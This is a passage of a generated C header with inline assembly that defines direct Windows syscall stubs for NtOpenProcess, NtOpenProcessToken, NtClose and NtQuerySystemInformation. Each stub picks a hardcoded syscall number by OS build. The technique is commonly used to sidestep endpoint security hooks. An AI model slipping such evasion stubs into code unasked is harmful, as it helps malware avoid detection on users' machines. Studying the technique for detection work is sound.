NtOpenProcessToken_SystemCall_6_3_XXXX \n\ 620 | jmp NtOpenProcessToken_SystemCall_Unknown \n\ 621 | NtOpenProcessToken_Check_6_1_XXXX: \n\ 622 | cmp word ptr [rax+0x120], 7600 \n\ 623 | je NtOpenProcessToken_SystemCall_6_1_7600 \n\ 624 | cmp word ptr [rax+0x120], 7601 \n\ 625 | je NtOpenProcessToken_SystemCall_6_1_7601 \n\ 626 | jmp NtOpenProcessToken_SystemCall_Unknown \n\ 627 | NtOpenProcessToken_Check_10_0_XXXX: \n\ 628 | cmp word ptr [rax+0x120], 10240 \n\ 629 | je NtOpenProcessToken_SystemCall_10_0_10240 \n\ 630 | cmp word ptr [rax+0x120], 10586 \n\ 631 | je NtOpenProcessToken_SystemCall_10_0_10586 \n\ 632 | cmp word ptr [rax+0x120], 14393 \n\ 633 | je NtOpenProcessToken_SystemCall_10_0_14393 \n\ 634 | cmp word ptr [rax+0x120], 15063 \n\ 635 | je NtOpenProcessToken_SystemCall_10_0_15063 \n\ 636 | cmp word ptr [rax+0x120], 16299 \n\ 637 | je NtOpenProcessToken_SystemCall_10_0_16299 \n\ 638 | cmp word ptr [rax+0x120], 17134 \n\ 639 | je NtOpenProcessToken_SystemCall_10_0_17134 \n\ 640 | cmp word ptr [rax+0x120], 17763 \n\ 641 | je NtOpenProcessToken_SystemCall_10_0_17763 \n\ 642 | cmp word ptr [rax+0x120], 18362 \n\ 643 | je NtOpenProcessToken_SystemCall_10_0_18362 \n\ 644 | cmp word ptr [rax+0x120], 18363 \n\ 645 | je NtOpenProcessToken_SystemCall_10_0_18363 \n\ 646 | cmp word ptr [rax+0x120], 19041 \n\ 647 | je NtOpenProcessToken_SystemCall_10_0_19041 \n\ 648 | cmp word ptr [rax+0x120], 19042 \n\ 649 | je NtOpenProcessToken_SystemCall_10_0_19042 \n\ 650 | jmp NtOpenProcessToken_SystemCall_Unknown \n\ 651 | NtOpenProcessToken_SystemCall_6_1_7600: \n\ 652 | mov eax, 0x00f9 \n\ 653 | jmp NtOpenProcessToken_Epilogue \n\ 654 | NtOpenProcessToken_SystemCall_6_1_7601: \n\ 655 | mov eax, 0x00f9 \n\ 656 | jmp NtOpenProcessToken_Epilogue \n\ 657 | NtOpenProcessToken_SystemCall_6_2_XXXX: \n\ 658 | mov eax, 0x010b \n\ 659 | jmp NtOpenProcessToken_Epilogue \n\ 660 | NtOpenProcessToken_SystemCall_6_3_XXXX: \n\ 661 | mov eax, 0x010e \n\ 662 | jmp NtOpenProcessToken_Epilogue \n\ 663 | NtOpenProcessToken_SystemCall_10_0_10240: \n\ 664 | mov eax, 0x0114 \n\ 665 | jmp NtOpenProcessToken_Epilogue \n\ 666 | NtOpenProcessToken_SystemCall_10_0_10586: \n\ 667 | mov eax, 0x0117 \n\ 668 | jmp NtOpenProcessToken_Epilogue \n\ 669 | NtOpenProcessToken_SystemCall_10_0_14393: \n\ 670 | mov eax, 0x0119 \n\ 671 | jmp NtOpenProcessToken_Epilogue \n\ 672 | NtOpenProcessToken_SystemCall_10_0_15063: \n\ 673 | mov eax, 0x011d \n\ 674 | jmp NtOpenProcessToken_Epilogue \n\ 675 | NtOpenProcessToken_SystemCall_10_0_16299: \n\ 676 | mov eax, 0x011f \n\ 677 | jmp NtOpenProcessToken_Epilogue \n\ 678 | NtOpenProcessToken_SystemCall_10_0_17134: \n\ 679 | mov eax, 0x0121 \n\ 680 | jmp NtOpenProcessToken_Epilogue \n\ 681 | NtOpenProcessToken_SystemCall_10_0_17763: \n\ 682 | mov eax, 0x0122 \n\ 683 | jmp NtOpenProcessToken_Epilogue \n\ 684 | NtOpenProcessToken_SystemCall_10_0_18362: \n\ 685 | mov eax, 0x0123 \n\ 686 | jmp NtOpenProcessToken_Epilogue \n\ 687 | NtOpenProcessToken_SystemCall_10_0_18363: \n\ 688 | mov eax, 0x0123 \n\ 689 | jmp NtOpenProcessToken_Epilogue \n\ 690 | NtOpenProcessToken_SystemCall_10_0_19041: \n\ 691 | mov eax, 0x0128 \n\ 692 | jmp NtOpenProcessToken_Epilogue \n\ 693 | NtOpenProcessToken_SystemCall_10_0_19042: \n\ 694 | mov eax, 0x0128 \n\ 695 | jmp NtOpenProcessToken_Epilogue \n\ 696 | NtOpenProcessToken_SystemCall_Unknown: \n\ 697 | ret \n\ 698 | NtOpenProcessToken_Epilogue: \n\ 699 | mov r10, rcx \n\ 700 | syscall \n\ 701 | ret \n\ 702 | "); 703 | 704 | #define ZwOpenProcess NtOpenProcess 705 | __asm__("NtOpenProcess: \n\ 706 | mov rax, gs:[0x60] \n\ 707 | NtOpenProcess_Check_X_X_XXXX: \n\ 708 | cmp dword ptr [rax+0x118], 6 \n\ 709 | je NtOpenProcess_Check_6_X_XXXX \n\ 710 | cmp dword ptr [rax+0x118], 10 \n\ 711 | je NtOpenProcess_Check_10_0_XXXX \n\ 712 | jmp NtOpenProcess_SystemCall_Unknown \n\ 713 | NtOpenProcess_Check_6_X_XXXX: \n\ 714 | cmp dword ptr [rax+0x11c], 1 \n\ 715 | je NtOpenProcess_Check_6_1_XXXX \n\ 716 | cmp dword ptr [rax+0x11c], 2 \n\ 717 | je NtOpenProcess_SystemCall_6_2_XXXX \n\ 718 | cmp dword ptr [rax+0x11c], 3 \n\ 719 | je NtOpenProcess_SystemCall_6_3_XXXX \n\ 720 | jmp NtOpenProcess_SystemCall_Unknown \n\ 721 | NtOpenProcess_Check_6_1_XXXX: \n\ 722 | cmp word ptr [rax+0x120], 7600 \n\ 723 | je NtOpenProcess_SystemCall_6_1_7600 \n\ 724 | cmp word ptr [rax+0x120], 7601 \n\ 725 | je NtOpenProcess_SystemCall_6_1_7601 \n\ 726 | jmp NtOpenProcess_SystemCall_Unknown \n\ 727 | NtOpenProcess_Check_10_0_XXXX: \n\ 728 | cmp word ptr [rax+0x120], 10240 \n\ 729 | je NtOpenProcess_SystemCall_10_0_10240 \n\ 730 | cmp word ptr [rax+0x120], 10586 \n\ 731 | je NtOpenProcess_SystemCall_10_0_10586 \n\ 732 | cmp word ptr [rax+0x120], 14393 \n\ 733 | je NtOpenProcess_SystemCall_10_0_14393 \n\ 734 | cmp word ptr [rax+0x120], 15063 \n\ 735 | je NtOpenProcess_SystemCall_10_0_15063 \n\ 736 | cmp word ptr [rax+0x120], 16299 \n\ 737 | je NtOpenProcess_SystemCall_10_0_16299 \n\ 738 | cmp word ptr [rax+0x120], 17134 \n\ 739 | je NtOpenProcess_SystemCall_10_0_17134 \n\ 740 | cmp word ptr [rax+0x120], 17763 \n\ 741 | je NtOpenProcess_SystemCall_10_0_17763 \n\ 742 | cmp word ptr [rax+0x120], 18362 \n\ 743 | je NtOpenProcess_SystemCall_10_0_18362 \n\ 744 | cmp word ptr [rax+0x120], 18363 \n\ 745 | je NtOpenProcess_SystemCall_10_0_18363 \n\ 746 | cmp word ptr [rax+0x120], 19041 \n\ 747 | je NtOpenProcess_SystemCall_10_0_19041 \n\ 748 | cmp word ptr [rax+0x120], 19042 \n\ 749 | je NtOpenProcess_SystemCall_10_0_19042 \n\ 750 | jmp NtOpenProcess_SystemCall_Unknown \n\ 751 | NtOpenProcess_SystemCall_6_1_7600: \n\ 752 | mov eax, 0x0023 \n\ 753 | jmp NtOpenProcess_Epilogue \n\ 754 | NtOpenProcess_SystemCall_6_1_7601: \n\ 755 | mov eax, 0x0023 \n\ 756 | jmp NtOpenProcess_Epilogue \n\ 757 | NtOpenProcess_SystemCall_6_2_XXXX: \n\ 758 | mov eax, 0x0024 \n\ 759 | jmp NtOpenProcess_Epilogue \n\ 760 | NtOpenProcess_SystemCall_6_3_XXXX: \n\ 761 | mov eax, 0x0025 \n\ 762 | jmp NtOpenProcess_Epilogue \n\ 763 | NtOpenProcess_SystemCall_10_0_10240: \n\ 764 | mov eax, 0x0026 \n\ 765 | jmp NtOpenProcess_Epilogue \n\ 766 | NtOpenProcess_SystemCall_10_0_10586: \n\ 767 | mov eax, 0x0026 \n\ 768 | jmp NtOpenProcess_Epilogue \n\ 769 | NtOpenProcess_SystemCall_10_0_14393: \n\ 770 | mov eax, 0x0026 \n\ 771 | jmp NtOpenProcess_Epilogue \n\ 772 | NtOpenProcess_SystemCall_10_0_15063: \n\ 773 | mov eax, 0x0026 \n\ 774 | jmp NtOpenProcess_Epilogue \n\ 775 | NtOpenProcess_SystemCall_10_0_16299: \n\ 776 | mov eax, 0x0026 \n\ 777 | jmp NtOpenProcess_Epilogue \n\ 778 | NtOpenProcess_SystemCall_10_0_17134: \n\ 779 | mov eax, 0x0026 \n\ 780 | jmp NtOpenProcess_Epilogue \n\ 781 | NtOpenProcess_SystemCall_10_0_17763: \n\ 782 | mov eax, 0x0026 \n\ 783 | jmp NtOpenProcess_Epilogue \n\ 784 | NtOpenProcess_SystemCall_10_0_18362: \n\ 785 | mov eax, 0x0026 \n\ 786 | jmp NtOpenProcess_Epilogue \n\ 787 | NtOpenProcess_SystemCall_10_0_18363: \n\ 788 | mov eax, 0x0026 \n\ 789 | jmp NtOpenProcess_Epilogue \n\ 790 | NtOpenProcess_SystemCall_10_0_19041: \n\ 791 | mov eax, 0x0026 \n\ 792 | jmp NtOpenProcess_Epilogue \n\ 793 | NtOpenProcess_SystemCall_10_0_19042: \n\ 794 | mov eax, 0x0026 \n\ 795 | jmp NtOpenProcess_Epilogue \n\ 796 | NtOpenProcess_SystemCall_Unknown: \n\ 797 | ret \n\ 798 | NtOpenProcess_Epilogue: \n\ 799 | mov r10, rcx \n\ 800 | syscall \n\ 801 | ret \n\ 802 | "); 803 | 804 | #define ZwClose NtClose 805 | __asm__("NtClose: \n\ 806 | mov rax, gs:[0x60] \n\ 807 | NtClose_Check_X_X_XXXX: \n\ 808 | cmp dword ptr [rax+0x118], 6 \n\ 809 | je NtClose_Check_6_X_XXXX \n\ 810 | cmp dword ptr [rax+0x118], 10 \n\ 811 | je NtClose_Check_10_0_XXXX \n\ 812 | jmp NtClose_SystemCall_Unknown \n\ 813 | NtClose_Check_6_X_XXXX: \n\ 814 | cmp dword ptr [rax+0x11c], 1 \n\ 815 | je NtClose_Check_6_1_XXXX \n\ 816 | cmp dword ptr [rax+0x11c], 2 \n\ 817 | je NtClose_SystemCall_6_2_XXXX \n\ 818 | cmp dword ptr [rax+0x11c], 3 \n\ 819 | je NtClose_SystemCall_6_3_XXXX \n\ 820 | jmp NtClose_SystemCall_Unknown \n\ 821 | NtClose_Check_6_1_XXXX: \n\ 822 | cmp word ptr [rax+0x120], 7600 \n\ 823 | je NtClose_SystemCall_6_1_7600 \n\ 824 | cmp word ptr [rax+0x120], 7601 \n\ 825 | je NtClose_SystemCall_6_1_7601 \n\ 826 | jmp NtClose_SystemCall_Unknown \n\ 827 | NtClose_Check_10_0_XXXX: \n\ 828 | cmp word ptr [rax+0x120], 10240 \n\ 829 | je NtClose_SystemCall_10_0_10240 \n\ 830 | cmp word ptr [rax+0x120], 10586 \n\ 831 | je NtClose_SystemCall_10_0_10586 \n\ 832 | cmp word ptr [rax+0x120], 14393 \n\ 833 | je NtClose_SystemCall_10_0_14393 \n\ 834 | cmp word ptr [rax+0x120], 15063 \n\ 835 | je NtClose_SystemCall_10_0_15063 \n\ 836 | cmp word ptr [rax+0x120], 16299 \n\ 837 | je NtClose_SystemCall_10_0_16299 \n\ 838 | cmp word ptr [rax+0x120], 17134 \n\ 839 | je NtClose_SystemCall_10_0_17134 \n\ 840 | cmp word ptr [rax+0x120], 17763 \n\ 841 | je NtClose_SystemCall_10_0_17763 \n\ 842 | cmp word ptr [rax+0x120], 18362 \n\ 843 | je NtClose_SystemCall_10_0_18362 \n\ 844 | cmp word ptr [rax+0x120], 18363 \n\ 845 | je NtClose_SystemCall_10_0_18363 \n\ 846 | cmp word ptr [rax+0x120], 19041 \n\ 847 | je NtClose_SystemCall_10_0_19041 \n\ 848 | cmp word ptr [rax+0x120], 19042 \n\ 849 | je NtClose_SystemCall_10_0_19042 \n\ 850 | jmp NtClose_SystemCall_Unknown \n\ 851 | NtClose_SystemCall_6_1_7600: \n\ 852 | mov eax, 0x000c \n\ 853 | jmp NtClose_Epilogue \n\ 854 | NtClose_SystemCall_6_1_7601: \n\ 855 | mov eax, 0x000c \n\ 856 | jmp NtClose_Epilogue \n\ 857 | NtClose_SystemCall_6_2_XXXX: \n\ 858 | mov eax, 0x000d \n\ 859 | jmp NtClose_Epilogue \n\ 860 | NtClose_SystemCall_6_3_XXXX: \n\ 861 | mov eax, 0x000e \n\ 862 | jmp NtClose_Epilogue \n\ 863 | NtClose_SystemCall_10_0_10240: \n\ 864 | mov eax, 0x000f \n\ 865 | jmp NtClose_Epilogue \n\ 866 | NtClose_SystemCall_10_0_10586: \n\ 867 | mov eax, 0x000f \n\ 868 | jmp NtClose_Epilogue \n\ 869 | NtClose_SystemCall_10_0_14393: \n\ 870 | mov eax, 0x000f \n\ 871 | jmp NtClose_Epilogue \n\ 872 | NtClose_SystemCall_10_0_15063: \n\ 873 | mov eax, 0x000f \n\ 874 | jmp NtClose_Epilogue \n\ 875 | NtClose_SystemCall_10_0_16299: \n\ 876 | mov eax, 0x000f \n\ 877 | jmp NtClose_Epilogue \n\ 878 | NtClose_SystemCall_10_0_17134: \n\ 879 | mov eax, 0x000f \n\ 880 | jmp NtClose_Epilogue \n\ 881 | NtClose_SystemCall_10_0_17763: \n\ 882 | mov eax, 0x000f \n\ 883 | jmp NtClose_Epilogue \n\ 884 | NtClose_SystemCall_10_0_18362: \n\ 885 | mov eax, 0x000f \n\ 886 | jmp NtClose_Epilogue \n\ 887 | NtClose_SystemCall_10_0_18363: \n\ 888 | mov eax, 0x000f \n\ 889 | jmp NtClose_Epilogue \n\ 890 | NtClose_SystemCall_10_0_19041: \n\ 891 | mov eax, 0x000f \n\ 892 | jmp NtClose_Epilogue \n\ 893 | NtClose_SystemCall_10_0_19042: \n\ 894 | mov eax, 0x000f \n\ 895 | jmp NtClose_Epilogue \n\ 896 | NtClose_SystemCall_Unknown: \n\ 897 | ret \n\ 898 | NtClose_Epilogue: \n\ 899 | mov r10, rcx \n\ 900 | syscall \n\ 901 | ret \n\ 902 | "); 903 | 904 | #define ZwQuerySystemInformation NtQuerySystemInformation 905 | __asm__("NtQuerySystemInformation: \n\ 906 | mov rax, gs:[0x60] \n\ 907 | NtQuerySystemInformation_Check_X_X_XXXX: \n\ 908 | cmp dword ptr [rax+0x118], 6 \n\ 909 | je NtQuerySystemInformation_Check_6_X_XXXX \n\ 910 | cmp dword ptr [rax+0x118], 10 \n\ 911 | je NtQuerySystemInformation_Check_10_0_XXXX \n\ 912 | jmp NtQuerySystemInformation_SystemCall_Unknown \n\ 913 | NtQuerySystemInformation_Check_6_X_XXXX: \n\ 914 | cmp dword ptr [rax+0x11c], 1 \n\ 915 | je NtQuerySystemInformation_Check_6_1_XXXX \n\ 916 | cmp dword ptr [rax+0x11c], 2 \n\ 917 | je NtQuerySystemInformation_SystemCall_6_2_XXXX \n\ 918 | cmp dword ptr [rax+0x11c], 3 \n\ 919 | je NtQuerySystemInformation_SystemCall_6_3_XXXX \n\ 920 | jmp NtQuerySystemInformation_SystemCall_Unknown \n\ 921 | NtQuerySystemInformation_Check_6_1_XXXX: \n\ 922 | cmp word ptr [rax+0x120], 7600 \n\ 923 | je NtQuerySystemInformation_SystemCall_6_1_7600 \n\ 924 | cmp word ptr [rax+0x120], 7601 \n\ 925 | je NtQuerySystemInformation_SystemCall_6_1_7601 \n\ 926 | jmp NtQuerySystemInformation_SystemCall_Unknown \n\ 927 | NtQuerySystemInformation_Check_10_0_XXXX: \n\ 928 | cmp word ptr [rax+0x120], 10240 \n\ 929 | je NtQuerySystemInformation_SystemCall_10_0_10240 \n\ 930 | cmp word ptr [rax+0x120], 10586 \n\ 931 | je NtQuerySystemInformation_SystemCall_10_0_10586 \n\ 932 | cmp word ptr [rax+0x120], 14393 \n\ 933 | je NtQuerySystemInformation_SystemCall_10_0_14393 \n\ 934 | cmp word ptr [rax+0x120], 15063 \n\ 935 | je NtQuerySystemInformation_SystemCall_10_0_15063 \n\ 936 | cmp word ptr [rax+0x120], 16299 \n\ 937 | je NtQuerySystemInformation_SystemCall_10_0_16299 \n\ 938 | cmp word ptr [rax+0x120], 17134 \n\ 939 | je NtQuerySystemInformation_SystemCall_10_0_17134 \n\ 940 | cmp word ptr [rax+0x120], 17763 \n\ 941 | je NtQuerySystemInformation_SystemCall_10_0_17763 \n\ 942 | cmp word ptr [rax+0x120], 18362 \n\ 943 | je NtQuerySystemInformation_SystemCall_10_0_18362 \n\ 944 | cmp word ptr [rax+0x120], 18363 \n\ 945 | je NtQuerySystemInformation_SystemCall_10_0_18363 \n\ 946 | cmp word ptr [rax+0x120], 19041 \n\ 947 | je NtQuerySystemInformation_SystemCall_10_0_19041 \n\ 948 | cmp word ptr [rax+0x120], 19042 \n\ 949 | je NtQuerySystemInformation_SystemCall_10_0_19042 \n\ 950 | jmp NtQuerySystemInformation_SystemCall_Unknown \n\ 951 | NtQuerySystemInformation_SystemCall_6_1_7600: \n\ 952 | mov eax, 0x0033 \n\ 953 | jmp NtQuerySystemInformation_Epilogue \n\ 954 | NtQuerySystemInformation_SystemCall_6_1_7601: \n\ 955 | mov eax, 0x0033 \n\ 956 | jmp NtQuerySystemInformation_Epilogue \n\ 957 | NtQuerySystemInformation_SystemCall_6_2_XXXX: \n\ 958 | mov eax, 0x0034 \n\ 959 | jmp NtQuerySystemInformation_Epilogue \n\ 960 | NtQuerySystemInformation_SystemCall_6_3_XXXX: \n\ 961 | mov eax, 0x0035 \n\ 962 | jmp NtQuerySystemInformation_Epilogue \n\ 963 | NtQuerySystemInformation_SystemCall_10_0_10240: \n\ 964 | mov eax, 0x0036 \n\ 965 | jmp NtQuerySystemInformation_Epilogue \n\ 966 | NtQuerySystemInformation_SystemCall_10_0_10586: \n\ 967 | mov eax, 0x0036 \n\ 968 | jmp NtQuerySystemInformation_Epilogue \n\ 969 | NtQuerySystemInformation_SystemCall_10_0_14393: \n\ 970 | mov eax, 0x0036 \n\ 971 | jmp NtQuerySystemInformation_Epilogue \n\ 972 | NtQuerySystemInformation_SystemCall_10_0_15063: \n\ 973 | mov eax, 0x0036 \n\ 974 | jmp NtQuerySystemInformation_Epilogue \n\ 975 | NtQuerySystemInformation_SystemCall_10_0_16299: \n\ 976 | mov eax, 0x0036 \n\ 977 | jmp NtQuerySystemInformation_Epilogue \n\ 978 | NtQuerySystemInformation_SystemCall_10_0_17134: \n\ 979 | mov eax, 0x0036 \n\ 980 | jmp NtQuerySystemInformation_Epilogue \n\ 981 | NtQuerySystemInformation_SystemCall_10_0_17763: \n\ 982 | mov eax, 0x0036 \n\ 983 | jmp NtQuerySystemInformation_Epilogue \n\ 984 | NtQuerySystemInformation_SystemCall_10_0_18362: \n\ 985 | mov eax, 0x0036 \n\ 986 | jmp NtQuerySystemInformation_Epilogue \n\ 987 | NtQuerySystemInformation_SystemCall_10_0_18363: \n\ 988 | mov eax, 0x0036 \n\ 989 | jmp NtQuerySystemInformation_Epilogue \n\ 990 | NtQuerySystemInformation_SystemCall_10_0_19041: \n\ 991 | mov eax, 0x0036 \n\ 992 | jmp NtQuerySystemInformation_Epilogue \n\ 993 | NtQuerySystemInformation_SystemCall_10_0_19042: \n\ 994 | mov eax, 0x0036 \n\ 995 | jmp NtQuerySystemInformation_Epilogue \n\ 996 | NtQuerySystemInformation_SystemCall_Unknown: \n\ 997 | ret \n\ 998 | NtQuerySystemInformation_Epilogue: \n\ 999 | mov r10, rcx \n\ 1000 | syscall \n\ 1001 | ret \n\ 1002 | "); 1003 | --------------------------------------------------------------------------------